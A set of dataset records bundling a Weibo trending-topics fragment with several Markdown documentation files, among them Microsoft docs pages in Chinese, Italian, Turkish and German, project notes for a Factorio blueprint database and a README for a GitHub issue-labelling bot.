44.喀什完成全员核酸检测
微博热度:210303
45.故宫银杏绝美秋景
微博热度:207767
46.喀什新增5例确诊病例
微博热度:204859
47.螺蛳粉闻臭师日闻300吨酸笋
微博热度:202861
48.江歌母亲诉谭斌侮辱诽谤案二审宣判
微博热度:162544
49.考试时停电高三生开台灯淡定答题
微博热度:148088
50.原来是晶哥
微博热度:147530
| 7.053922 | 20 | 0.787352 | yue_Hant | 0.377213 |
97970e9b4da908fe734bd3490f5b09cc19da1c9a | 1,159 | md | Markdown | aspnetcore/client-side/spa/react-with-redux.md | 764297968/Docs.zh-cn | 419059912de53165d8897c710cf5307a07c03ed1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | aspnetcore/client-side/spa/react-with-redux.md | 764297968/Docs.zh-cn | 419059912de53165d8897c710cf5307a07c03ed1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | aspnetcore/client-side/spa/react-with-redux.md | 764297968/Docs.zh-cn | 419059912de53165d8897c710cf5307a07c03ed1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 通过 ASP.NET Core 使用带 Redux 的 React 项目模板
author: SteveSandersonMS
description: 了解如何开始使用适用于带 Redux 的 React 和 create-react-app 的 ASP.NET Core 单页应用程序 (SPA) 项目模板。
monikerRange: '>= aspnetcore-2.0'
ms.author: scaddie
ms.custom: mvc
ms.date: 02/21/2018
uid: spa/react-with-redux
ms.openlocfilehash: dab3d20865250aae548bff4614e631dd7c73b46f
ms.sourcegitcommit: a1afd04758e663d7062a5bfa8a0d4dca38f42afc
ms.translationtype: MT
ms.contentlocale: zh-CN
ms.lasthandoff: 06/20/2018
ms.locfileid: "36291480"
---
# <a name="use-the-react-with-redux-project-template-with-aspnet-core"></a>通过 ASP.NET Core 使用带 Redux 的 React 项目模板
::: moniker range="= aspnetcore-2.0"
> [!NOTE]
> 本文档不涉及 ASP.NET Core 2.0 中包含的带 Redux 的 React项目模板。 本文介绍你可以手动更新的新版带 Redux 的 React 模板。 该模板默认包含在 ASP.NET Core 2.1 中。
::: moniker-end
更新的带 Redux 的 React 项目模板为使用 React、Redux 和 [create-react-app](https://github.com/facebookincubator/create-react-app) (CRA) 约定实现丰富的客户端用户界面 (UI) 的 ASP.NET Core 应用程序提供了便捷起点。
除了项目创建命令外,关于带 Redux 的 React 模板的所有信息都与 React 模板相同。 要创建此项目类型,请运行 `dotnet new reactredux` 而不是 `dotnet new react`。 有关这两个基于 React 的模板的通用功能的详细信息,请参阅 [React 模板文档](xref:spa/react)。
| 39.965517 | 172 | 0.764452 | yue_Hant | 0.716235 |
97977616223aeeb0f59960b016ca6cea7c42feaf | 2,573 | md | Markdown | docs/2014/integration-services/access-to-the-integration-services-service.md | baleng/sql-docs.it-it | 80bb05c3cc6a68564372490896545d6211a9fa26 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/2014/integration-services/access-to-the-integration-services-service.md | baleng/sql-docs.it-it | 80bb05c3cc6a68564372490896545d6211a9fa26 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/2014/integration-services/access-to-the-integration-services-service.md | baleng/sql-docs.it-it | 80bb05c3cc6a68564372490896545d6211a9fa26 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Servizio servizi di accesso per l'integrazione | Microsoft Docs
ms.custom: ''
ms.date: 03/06/2017
ms.prod: sql-server-2014
ms.reviewer: ''
ms.technology:
- integration-services
ms.topic: conceptual
helpviewer_keywords:
- SSIS packages, security
- viewing packages while running
- displaying packacges while running
- security [Integration Services], running packages
- packages [Integration Services], security
- current packages running
- Integration Services packages, security
- SQL Server Integration Services packages, security
ms.assetid: 1088aafc-14c5-4e7d-9930-606a24c3049b
author: douglaslms
ms.author: douglasl
manager: craigg
ms.openlocfilehash: 7e9baff13c2bc368557a49b4509c6e48a444d583
ms.sourcegitcommit: 3da2edf82763852cff6772a1a282ace3034b4936
ms.translationtype: MT
ms.contentlocale: it-IT
ms.lasthandoff: 10/02/2018
ms.locfileid: "48132121"
---
# <a name="access-to-the-integration-services-service"></a>Accesso al servizio Integration Services
Tramite i livelli di protezione dei pacchetti è possibile limitare gli utenti a cui è consentito modificare ed eseguire un pacchetto. Per limitare gli utenti a cui è consentito visualizzare l'elenco di pacchetti attualmente in esecuzione in un server e arrestare i pacchetti attualmente in esecuzione in [!INCLUDE[ssManStudioFull](../includes/ssmanstudiofull-md.md)]è necessaria una protezione aggiuntiva.
In [!INCLUDE[ssManStudioFull](../includes/ssmanstudiofull-md.md)] l'elenco dei pacchetti in esecuzione viene visualizzato tramite il servizio [!INCLUDE[ssNoVersion](../includes/ssnoversion-md.md)]. I membri del gruppo Administrators di Windows possono visualizzare e arrestare tutti i pacchetti in esecuzione. Gli utenti che non appartengono a questo gruppo possono visualizzare e arrestare solo i pacchetti che hanno avviato personalmente.
È importante limitare l'accesso ai computer che eseguono un servizio [!INCLUDE[ssNoVersion](../includes/ssnoversion-md.md)] , soprattutto se si tratta di un servizio [!INCLUDE[ssNoVersion](../includes/ssnoversion-md.md)] che consente l'enumerazione di cartelle remote. Gli utenti autenticati possono richiedere l'enumerazione di pacchetti. Anche se il servizio non viene individuato, le cartelle vengono comunque enumerate dal servizio. Questi nomi di cartella potrebbero essere sfruttati da un utente malintenzionato. Se un amministratore ha configurato il servizio in modo da consentire l'enumerazione di cartelle in un computer remoto, agli utenti potrebbero essere visualizzati anche i nomi di cartella in genere non visibili.
| 67.710526 | 733 | 0.813059 | ita_Latn | 0.992586 |
97980153403b0ebf74f41a5a7dfad8c4c611062b | 2,422 | md | Markdown | docs/csharp/language-reference/index.md | cihanyakar/docs.tr-tr | 03b6c8998a997585f61b8be289df105261125239 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/csharp/language-reference/index.md | cihanyakar/docs.tr-tr | 03b6c8998a997585f61b8be289df105261125239 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/csharp/language-reference/index.md | cihanyakar/docs.tr-tr | 03b6c8998a997585f61b8be289df105261125239 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: C# Başvurusu
ms.date: 02/14/2017
helpviewer_keywords:
- Visual C#, language reference
- language reference [C#]
- Programmer's Reference for C#
- C# language, reference
- reference, C# language
ms.assetid: 06de3167-c16c-4e1a-b3c5-c27841d4569a
ms.openlocfilehash: c9400c2836d923fe92ed88ec947a1953800bc47d
ms.sourcegitcommit: 77d9a94dac4c05827ed0663d95e0f9ad35d6682e
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 05/24/2018
ms.locfileid: "34472509"
---
# <a name="c-reference"></a>C# Başvurusu
Bu bölümde, C# anahtar sözcükleri, işleçler, özel karakterler, önişlemci yönergeleri, derleyici seçenekleri ve derleyici hataları ve Uyarıları hakkında başvuru bilgileri sağlar.
## <a name="in-this-section"></a>Bu Bölümde
[C# Anahtar Sözcükleri](../../csharp/language-reference/keywords/index.md)
C# anahtar sözcükleri ve sözdizimi hakkında bilgilere bağlantılar sağlar.
[C# İşleçleri](../../csharp/language-reference/operators/index.md)
C# işleçleri ve sözdizimi hakkında bilgilere bağlantılar sağlar.
[C# Özel Karakterleri](../../csharp/language-reference/tokens/index.md)
C# ve bunların kullanım özel bağlamsal karakterler hakkında bilgilere bağlantılar sağlar.
[C# Ön İşlemci Yönergeleri](../../csharp/language-reference/preprocessor-directives/index.md)
C# kaynak kodu olarak katıştırma derleyici komutlar hakkında bilgilere bağlantılar sağlar.
[C# Derleyici Seçenekleri](../../csharp/language-reference/compiler-options/index.md)
Derleyici seçenekleri ve bunların nasıl kullanılacağını hakkında bilgiler içerir.
[C# Derleyici Hataları](../../csharp/language-reference/compiler-messages/index.md)
Neden ve C# derleyici hataları ve Uyarıları düzeltme gösteren kod parçacıkları içerir.
[C# dil belirtimi](../../csharp/language-reference/language-specification/index.md)
C# dil belirtimi en son sürümlerini bağlantılar sağlar.
## <a name="related-sections"></a>İlgili Bölümler
[C# Kılavuzu](../../csharp/index.md)
Visual C# belgeleri için bir portal sağlar.
[C# için Visual Studio Geliştirme Ortamını Kullanma](/visualstudio/csharp-ide/using-the-visual-studio-development-environment-for-csharp)
IDE ve düzenleyici açıklayan görev konuları ve kavramsal bağlantılar sağlar.
[C# Programlama Kılavuzu](../../csharp/programming-guide/index.md)
C# programlama dilini kullanma hakkında bilgi içerir.
| 45.698113 | 179 | 0.760941 | tur_Latn | 0.996116 |
97985448831087fe5716190f127fbcf14a989907 | 2,806 | md | Markdown | NOTES.md | factorio-tools/blueprints-db | 9eb1bec94ef25cb8842d885181410cd5ec1d9bb0 | [
"MIT"
] | 8 | 2019-05-29T23:29:26.000Z | 2020-08-28T14:32:31.000Z | NOTES.md | factorio-tools/blueprints-db | 9eb1bec94ef25cb8842d885181410cd5ec1d9bb0 | [
"MIT"
] | 29 | 2019-06-10T12:55:16.000Z | 2021-06-06T18:02:29.000Z | NOTES.md | factorio-tools/blueprints-database | 9eb1bec94ef25cb8842d885181410cd5ec1d9bb0 | [
"MIT"
] | null | null | null | # Factorio Blueprints Database
## Features
### Filtering
- mods
- game version
- game stage (early/mid/late-game) - maybe generated automatically based on a set of rules that would be provided for the user as well (for transparency reasons)
- beacons? - could be included as a late-game thing (same with modules?)
### Sorting
- page views
- downloads
- favorites
- popularity (taken into account would be page views, downloads and favorites)
- newly added
### Blueprint Page
- title
- headline
- description
- thumbnail (generated on the client via a popup modal using the viewer with some sort of square viewfinder to select the thumbnail) - maybe allow user uploads as well?
- blueprint statistics (can be extracted automatically from the blueprint string) - stuff like game version, mods used, blueprint name, blueprint icons, #of items used
- report button - site admins will see: the blueprint in question, nr of reports for it and a list of reasons from the users that have reported it
## Design
[InVision](
https://projects.invisionapp.com/share/PWS7F35KNTZ#/screens?browse)
## Tech stack
- Svelte (with Sapper) - framework like react/vue but lighter and faster
- ArangoDB - database that has built in support for search and is multi model (documents, graph, KV)
- GraphQL - not sure yet
- DigitalOcean - for hosting
- Cloudflare - for DNS and caching
- Backblaze B2 - for static files like images
- Cloudflare and Backblaze B2 are part of the "Bandwith Alliance" meaning you don't pay for the data transfer
## Cruddl Cheatsheet
[Reference](https://github.com/AEB-labs/cruddl/blob/master/docs/modelling.md)
### Object Types
@rootEntity
- main entity
@childEntity
- only used within a list type (ie items: [OrderItem])
@entityExtension
- object (ie paymentInfo: PaymentInfo)
- values can be omitted and they will not be overwritten
@valueObject
- like @entityExtension but atomic (omitted values will be set to null)
### Relations
@relation
@relation(inverseOf: "customer")
### References
@reference(keyField: "countryISOCode")
- cruddle 0.9 only
- will return the data in another @rootEntity using the key in the current @rootEntity
### References
@reference(keyField: "countryISOCode")
- cruddle 0.9 only
- will return the data in another @rootEntity using the key in the current @rootEntity
### Calculated fields
@traversal(path: "orders.items")
- follows a path and collects all objects on the way
@aggregation(path: "items.quantity", aggregator: SUM)
- same as @traversal but applies a fn to the collected objects
- aggregators:
- COUNT - supported on all kinds of types (object types and scalars)
- MIN, MAX - supported on Int, Float, DateTime, LocalDate and LocalTime
- AVERAGE, SUM - supported only on Int and Float
### Indices
@unique
@index
| 26.980769 | 168 | 0.751247 | eng_Latn | 0.985879 |
97993d6423bffe48664f10908bd4b917501683f7 | 48 | md | Markdown | README.md | Descalzo404/CS50-Problem-Sets | a05f39a33e4b5b478c2f2399d4fa4941aa133705 | [
"MIT"
] | null | null | null | README.md | Descalzo404/CS50-Problem-Sets | a05f39a33e4b5b478c2f2399d4fa4941aa133705 | [
"MIT"
] | null | null | null | README.md | Descalzo404/CS50-Problem-Sets | a05f39a33e4b5b478c2f2399d4fa4941aa133705 | [
"MIT"
] | null | null | null | # CS50
Problem sets from HarvardX course CS50.
| 16 | 40 | 0.770833 | eng_Latn | 0.939537 |
979956958ed04c5dc55f96cfe0f33484aee3190b | 1,191 | md | Markdown | README.md | jsdelivrbot/label-gun | 3eb6da1ab727aea31c6db7aa948e9f0b6c883273 | [
"ISC"
] | null | null | null | README.md | jsdelivrbot/label-gun | 3eb6da1ab727aea31c6db7aa948e9f0b6c883273 | [
"ISC"
] | 2 | 2017-10-26T09:48:01.000Z | 2018-02-25T15:19:08.000Z | README.md | retorquere/issue-bot | 4e0991eb651f2907612795770a4ccdc8bd825813 | [
"0BSD"
] | null | null | null | # issue-workflow
a GitHub App built with [probot](https://github.com/probot/probot) that automatically labels issues that require user feedback, on the assumption that if a repo contributer responds but does not close the issue, more user input is required. If a non-contributor responds, the label is removed.
You can steer this behavior by adding a yaml file in `.github/config.yml` in your repo that looks like
```
label-gun:
labels:
ignore:
- chatter
- wontfix
reopen:
- *
feedback: awaiting-user-feedback
```
which means:
1. Don't (unlabel) issues that have one or more of the named labels
2. If a non-contributor comments on a closed issue that carries one of these labels, reopen the issue. This works on the assumption that if users are still commenting on the issue, there are remaining questions, and the issue isn't really dealt with fully. `*` means "any issue, labelled or not"
3. Use this label to mark issues that require user feedback (`awaiting-user-feedback` is the default, so if you omit `feedback`, it will get this label.
## Setup
Install the GitHub App by visiting [this link](https://github.com/settings/apps/label-gun/installations)
| 44.111111 | 295 | 0.751469 | eng_Latn | 0.999136 |
9799d9ede5ec0f1cf2ada743907b17a4fe7dfd82 | 17,475 | md | Markdown | windows-apps-src/design/input/custom-text-input.md | Aaron-Junker/windows-uwp.de-de | 7171d224a4a27d04e54ab083568710e32235af3d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-apps-src/design/input/custom-text-input.md | Aaron-Junker/windows-uwp.de-de | 7171d224a4a27d04e54ab083568710e32235af3d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-apps-src/design/input/custom-text-input.md | Aaron-Junker/windows-uwp.de-de | 7171d224a4a27d04e54ab083568710e32235af3d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
description: Mit den Kerntext-APIs im Windows. UI. Text. Core-Namespace kann eine Windows-App Texteingaben von einem beliebigen Text Dienst empfangen, der auf Windows-Geräten unterstützt wird.
title: Übersicht über benutzerdefinierte Texteingabe
ms.assetid: 58F5F7AC-6A4B-45FC-8C2A-942730FD7B74
label: Custom text input
template: detail.hbs
keywords: Tastatur, Text, Core-Text, benutzerdefinierter Text, Textdienstframework, Eingabe, Benutzerinteraktionen
ms.date: 09/24/2020
ms.topic: article
ms.localizationpriority: medium
ms.openlocfilehash: 95dbd6de78cb6670ea7e904252bbc1f9f14edb77
ms.sourcegitcommit: 4f032d7bb11ea98783db937feed0fa2b6f9950ef
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 10/08/2020
ms.locfileid: "91829635"
---
# <a name="custom-text-input"></a>Benutzerdefinierte Texteingabe
Mit den Kerntext-APIs im [**Windows. UI. Text. Core**](/uwp/api/Windows.UI.Text.Core) -Namespace kann eine Windows-App Texteingaben von einem beliebigen Text Dienst empfangen, der auf Windows-Geräten unterstützt wird. Die APIs sind den [Textdienstframework](/windows/desktop/TSF/text-services-framework)-APIs dahingehend ähnlich, dass die App keine detaillierten Kenntnisse über die Textdienste benötigt. Auf diese Weise kann die App Text in einer beliebigen Sprache und von einem beliebigen Eingabegerät empfangen, wie Tastatur, Sprache oder Stift.
> **Wichtige APIs**: [**Windows. UI. Text. Core**](/uwp/api/Windows.UI.Text.Core), [**coretexteditcontext**](/uwp/api/Windows.UI.Text.Core.CoreTextEditContext)
## <a name="why-use-core-text-apis"></a>Gründe für die Verwendung von Core-Text-APIs
Für zahlreiche Apps sind die XAML- oder HTML-Textfeld-Steuerelemente für Texteingabe und Textbearbeitung ausreichend. Wenn Ihre App jedoch komplexe Textszenarien behandelt, beispielsweise eine Textverarbeitungs-App ist, benötigen Sie vielleicht die Flexibilität eines benutzerdefinierten Textbearbeitungssteuerelements. Sie könnten die [**CoreWindow**](/uwp/api/Windows.UI.Core.CoreWindow)-Tastatur APIs verwenden, um das Textbearbeitungssteuerelement zu erstellen. Diese ermöglichen jedoch keinen Empfang von kompositionsbasierten Texteingaben, die für die Unterstützung ostasiatischer Sprachen erforderlich sind.
Verwenden Sie stattdessen die [**Windows.UI.Text.Core**](/uwp/api/Windows.UI.Text.Core)-APIs, wenn Sie ein benutzerdefiniertes Textbearbeitungssteuerelement erstellen müssen. Diese APIs sind so konzipiert, dass sie Ihnen ein hohes Maß an Flexibilität bei der Verarbeitung von Texteingaben in allen Sprachen bieten. Sie können daher Textverarbeitung so gestalten, wie dies für Ihre App am besten ist. Texteingabe- und Textbearbeitungssteuerelemente, die mit den Core-Text-APIs erstellt wurde, können Texteingaben von allen vorhandenen Texteingabemethoden auf Windows-Geräten empfangen, von [Textdienstframework](/windows/desktop/TSF/text-services-framework)-basierten Eingabemethoden-Editoren (IMEs) und Handschrift auf PCs bis hin zu der WordFlow-Tastatur (die AutoKorrektur, Vorhersage und Diktat bereitstellt) auf mobilen Geräten.
## <a name="architecture"></a>Aufbau
Im Folgenden finden Sie eine einfache Darstellung des Texteingabesystems.
- "Application" stellt eine Windows-App dar, die ein benutzerdefiniertes Bearbeitungs Steuerelement mit den Kerntext-APIs erstellt.
- Die [**Windows.UI.Text.Core**](/uwp/api/Windows.UI.Text.Core)-APIs ermöglichen die Kommunikation mit Textdiensten über Windows. Die Kommunikation zwischen dem Textbearbeitungssteuerelement und den Textdiensten erfolgt in erster Linie über ein [**CoreTextEditContext**](/uwp/api/Windows.UI.Text.Core.CoreTextEditContext)-Objekt, das die Methoden und Ereignisse für die Kommunikation bereitstellt.

## <a name="text-ranges-and-selection"></a>Textbereiche und Auswahl
Bearbeitungssteuerelemente bieten Platz für die Eingabe von Text, und Benutzer erwarten, dass Text an einer beliebigen Stelle in diesem Bereich bearbeitet werden kann. Hier wird das von den Core-Text-APIs verwendete Textpositionierungssystem erläutert und wie Bereiche und Auswahlen in diesem System dargestellt werden.
### <a name="application-caret-position"></a>Textcursorposition der Anwendung
Textbereiche, die mit den Core-Text-APIs verwendet werden, werden mittels Textcursorpositionen ausgedrückt. Eine „Textcursorposition der Anwendung“ (Application Caret Position, ACP) ist eine nullbasierte Zahl, die die Anzahl der Zeichen vom Anfang des Textstreams bis unmittelbar vor dem Textcursor angibt, wie hier gezeigt.

### <a name="text-ranges-and-selection"></a>Textbereiche und Auswahl
Textbereiche und -auswahlen werden anhand der [**CoreTextRange**](/uwp/api/Windows.UI.Text.Core.CoreTextRange)-Struktur dargestellt, die zwei Felder enthält:
| Feld | Datentyp | Beschreibung |
|------------------------|---------------------------------------------------------------------------|----------------------------------------------------------------------------------|
| **StartCaretPosition** | **Zahl** \[ Ja\] | **System. Int32** \[ .net\] | **Int32** \[ C++\] | Die Startposition eines Bereichs ist die Textcursorposition der Anwendung unmittelbar vor dem ersten Zeichen. |
| **EndCaretPosition** | **Zahl** \[ Ja\] | **System. Int32** \[ .net\] | **Int32** \[ C++\] | Die Endposition eines Bereichs ist Textcursorposition der Anwendung unmittelbar nach dem letzten Zeichen. |
Im oben gezeigten Textbereich gibt der Bereich \[ 0, 5 z \] . b. das Wort "Hello" an. **StartCaretPosition** muss stets kleiner oder gleich der **EndCaretPosition** sein. Der Bereich \[ 5, 0 \] ist ungültig.
### <a name="insertion-point"></a>Einfügemarke
Die aktuelle Position der Einfügemarke, die häufig als Einfügemarke bezeichnet wird, wird dargestellt, indem die **startcaretposition** auf die **endcaretposition**festgelegt wird.
### <a name="noncontiguous-selection"></a>Nicht zusammenhängende Auswahl
Einige Bearbeitungssteuerelemente unterstützen nicht zusammenhängende Auswahlen. Microsoft Office-Apps unterstützen z. B. eine beliebige Mehrfachauswahl, und viele Quellcode-Editoren unterstützen die Spaltenauswahl. Die Kerntext-APIs unterstützen jedoch nicht zusammenhängende Auswahlmöglichkeiten. Bearbeitungssteuerelemente müssen nur eine einzige zusammenhängende Auswahl melden; meistens ist dies der aktive Unterbereich der nicht zusammenhängenden Auswahlen.
Die folgende Abbildung zeigt beispielsweise einen Textstream mit zwei nicht zusammenhängenden Auswahlen: \[ 0, 1 \] und \[ 6, 11 \] für die das Bearbeitungs Steuerelement nur eine Meldung (entweder \[ 0, 1 \] oder \[ 6, 11) melden muss \] .

## <a name="working-with-text"></a>Arbeiten mit Text
Die [**CoreTextEditContext**](/uwp/api/Windows.UI.Text.Core.CoreTextEditContext)-Klasse ermöglicht einen Textfluss zwischen Windows und Bearbeitungssteuerelementen über das [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignis, das [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis und die [**NotifyTextChanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged)-Methode.
Das Bearbeitungssteuerelement empfängt Text über die [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignisse, die generiert werden, wenn Benutzer mit Texteingabemethoden wie Tastaturen, Sprache oder IMEs interagieren.
Wenn Sie den Text im Bearbeitungs Steuerelement ändern, indem Sie z. b. Text in das Steuerelement einfügen, müssen Sie Windows Benachrichtigen, indem Sie [**notifytextchanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged)aufrufen.
Wenn der Textdienst den neuen Text erfordert, wird ein [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis ausgelöst. Sie müssen den neuen Text in den **TextRequested**-Ereignishandler eingeben.
### <a name="accepting-text-updates"></a>Akzeptieren von Textupdates
Ihr Bearbeitungssteuerelement sollte in der Regel Textaktualisierungsanforderungen akzeptieren, da diese den Text darstellen, den der Benutzer eingeben möchte. Im [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignishandler werden die folgenden Aktionen vom Bearbeitungssteuerelement erwartet:
1. Einfügen des Texts, der in [**CoreTextTextUpdatingEventArgs.Text**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.text) an der Position angegeben wurde, die in [**CoreTextTextUpdatingEventArgs.Range**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.range) angegeben wurde
2. Platzieren Sie die Auswahl an der in [**coretexttextupdatingeventargs. newselection**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.newselection)angegebenen Position.
3. Benachrichtigen des Systems, dass das Update erfolgreich war, indem [**CoreTextTextUpdatingEventArgs.Result**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.result) auf [**CoreTextTextUpdatingResult.Succeeded**](/uwp/api/Windows.UI.Text.Core.CoreTextTextUpdatingResult) festgelegt wird
Dies ist beispielsweise der Zustand eines Bearbeitungssteuerelements, bevor der Benutzer „d“ eingibt. Die Einfügemarke liegt bei \[ 10, 10 \] .
![Screenshot eines textstreamdiagramms mit der Einfügemarke bei \[ 10, 10 \] , vor einer Einfügung](images/coretext/stream-3.png)
Wenn der Benutzer „d“ eingibt, wird ein [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignis mit den folgenden [**CoreTextTextUpdatingEventArgs**](/uwp/api/Windows.UI.Text.Core.CoreTextTextUpdatingEventArgs)-Daten ausgelöst:
- [**Range**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.range) = Bereich \[ 10, 10\]
- [**Text**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.text) = "d"
- [**Neuauswahl**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.newselection) = \[ 11, 11\]
Wenden Sie in Ihrem Bearbeitungssteuerelement die angegebenen Änderungen an, und legen Sie [**Result**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.result) auf **Succeeded** fest. Hier sehen Sie den Zustand des Steuerelements, nachdem die Änderungen angewendet wurden.
:::image type="content" source="images/coretext/stream-4.png" alt-text="Screenshot eines textstreamdiagramms, das die Einfügemarke bei \[ 11, 11 \] nach einer Einfügung anzeigt":::
### <a name="rejecting-text-updates"></a>Ablehnen von Textupdates
Manchmal können Textaktualisierungen nicht angewendet werden, da sich der angeforderte Bereich in einem Bereich des Bearbeitungssteuerelements befindet, der nicht geändert werden darf. In diesem Fall sollten Sie keine Änderungen anwenden. Benachrichtigen Sie stattdessen das System, dass die Aktualisierung fehlgeschlagen ist, indem Sie [**CoreTextTextUpdatingEventArgs.Result**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.result) auf [**CoreTextTextUpdatingResult.Failed**](/uwp/api/Windows.UI.Text.Core.CoreTextTextUpdatingResult) festlegen.
Angenommen, Sie haben ein Bearbeitungssteuerelement, das nur eine E-Mail-Adresse akzeptiert. Leerzeichen sollten zurückgewiesen werden, da E-Mail-Adressen keine Leerzeichen enthalten dürfen. Wenn daher [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignisse für die Leertaste ausgelöst werden, können Sie [**Result**](/uwp/api/windows.ui.text.core.coretexttextupdatingeventargs.result) im Bearbeitungssteuerelement einfach auf **Failed** festlegen.
### <a name="notifying-text-changes"></a>Benachrichtigen über Textänderungen
Manchmal nimmt das Bearbeitungssteuerelement Änderungen am Text vor, wenn beispielsweise Text eingefügt oder automatische korrigiert wird. In diesen Fällen müssen Sie die Textdienste über diese Änderungen benachrichtigen, indem Sie die [**NotifyTextChanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged)-Methode aufrufen.
Dies ist beispielsweise der Zustand eines Bearbeitungssteuerelements, bevor der Benutzer „World“ einfügt. Die Einfügemarke ist \[ 6, 6 \] .
![Screenshot eines textstreamdiagramms mit der Einfügemarke bei \[ 6, 6 \] , vor einer Einfügung](images/coretext/stream-5.png)
Der Benutzer führt die Einfüge Aktion und das Bearbeitungs Steuerelement aus, nachdem die Änderungen angewendet wurden:
:::image type="content" source="images/coretext/stream-4.png" alt-text="Screenshot eines textstreamdiagramms, das die Einfügemarke bei \[ 11, 11 \] nach einer Einfügung anzeigt":::
In diesem Fall rufen Sie [**NotifyTextChanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged) mit den folgenden Argumenten auf:
- *modifiedrange* = \[ 6, 6\]
- *newLength* = 5
- *Neuauswahl* = \[ 11, 11\]
Es folgt mindestens ein [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis, das Sie zum Aktualisieren des Texts behandeln, mit dem die Textdienste arbeiten.
### <a name="overriding-text-updates"></a>Überschreiben von Textaktualisierungen
Vielleicht möchten Sie in Ihrem Bearbeitungssteuerelement eine Textaktualisierung überschreiben, um AutoKorrektur-Funktionen bereitzustellen.
Angenommen, Sie haben ein Bearbeitungssteuerelement, das eine Korrekturfunktion bereitstellt, das kontrahierte Schreibweisen formalisiert. Dies ist der Zustand des Bearbeitungssteuerelements, bevor der Benutzer die Leertaste drückt, um die Korrektur auszulösen. Die Einfügemarke ist \[ 3, 3 \] .
![Screenshot eines textstreamdiagramms mit der Einfügemarke bei \[ 3, 3 \] , vor einer Einfügung](images/coretext/stream-6.png)
Der Benutzer drückt die Leertaste, und es wird ein entsprechendes [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignis ausgelöst. Das Bearbeitungssteuerelement akzeptiert die Textaktualisierung. Dies ist der Zustand des Bearbeitungssteuerelements für einen kurzen Moment, bevor die Korrektur abgeschlossen ist. Die Einfügemarke ist \[ 4, 4 \] .
![Screenshot eines textstreamdiagramms, das die Einfügemarke bei \[ 4, 4 \] nach einer Einfügung anzeigt](images/coretext/stream-7.png)
Außerhalb des [**TextUpdating**](/uwp/api/windows.ui.text.core.coretexteditcontext.textupdating)-Ereignishandlers nimmt das Bearbeitungssteuerelement die folgende Korrektur vor. Dies ist der Zustand des Bearbeitungssteuerelements nach Abschluss der Korrektur. Die Einfügemarke ist \[ 5, 5 \] .
![Screenshot eines textstreamdiagramms mit der Einfügemarke bei \[ 5, 5\]](images/coretext/stream-8.png)
In diesem Fall rufen Sie [**NotifyTextChanged**](/uwp/api/windows.ui.text.core.coretexteditcontext.notifytextchanged) mit den folgenden Argumenten auf:
- *modifiedrange* = \[ 1, 2\]
- *newLength* = 2
- *Neuauswahl* = \[ 5, 5\]
Es folgt mindestens ein [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis, das Sie zum Aktualisieren des Texts behandeln, mit dem die Textdienste arbeiten.
### <a name="providing-requested-text"></a>Bereitstellen von angefordertem Text
Es ist wichtig, dass Textdienste über den richtigen Text verfügen, damit Funktionen wie AutoKorrektur oder Vorhersage bereitgestellt werden können, insbesondere bei Text, der im Bearbeitungssteuerelement bereits durch Laden eines Dokuments vorhanden war, oder bei Text, der vom Bearbeitungssteuerelement eingefügt wird, wie in den vorherigen Abschnitten erläutert. Wenn ein [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignis ausgelöst wird, müssen Sie daher stets den Text bereitstellen, der sich zurzeit im Bearbeitungssteuerelement für den angegebenen Bereich befindet.
Gelegentlich gibt [**Range**](/uwp/api/windows.ui.text.core.coretexttextrequest.range) in [**CoreTextTextRequest**](/uwp/api/Windows.UI.Text.Core.CoreTextTextRequest) einen Bereich an, den das Bearbeitungssteuerelement nicht in der Form aufnehmen kann, in der dieser vorliegt. Beispielsweise ist **Range** zum Zeitpunkt des [**TextRequested**](/uwp/api/windows.ui.text.core.coretexteditcontext.textrequested)-Ereignisses größer als das Bearbeitungssteuerelement, oder das Ende von **Range** liegt außerhalb des zulässigen Bereichs. In diesen Fällen sollten Sie zu einem Bereich zurückkehren, der sinnvoll ist. In der Regel ist dies eine Untergruppe des angeforderten Bereichs.
## <a name="related-articles"></a>Verwandte Artikel
### <a name="samples"></a>Beispiele
- [Beispiel für ein benutzerdefiniertes Bearbeitungssteuerelement](https://github.com/Microsoft/Windows-universal-samples/tree/master/Samples/CustomEditControl)
